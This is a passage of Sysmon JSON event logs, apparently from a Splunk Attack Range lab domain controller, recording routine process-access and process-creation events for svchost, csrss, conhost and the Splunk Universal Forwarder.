{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nTargetProcessId: 3828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","TargetProcessId":"3828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.545\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-0010EB8B0500}\r\nProcessId: 4548\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.545","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010EB8B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EB8B0500}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EB8B0500}","TargetProcessId":"4548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EB8B0500}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EB8B0500}","TargetProcessId":"4548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.d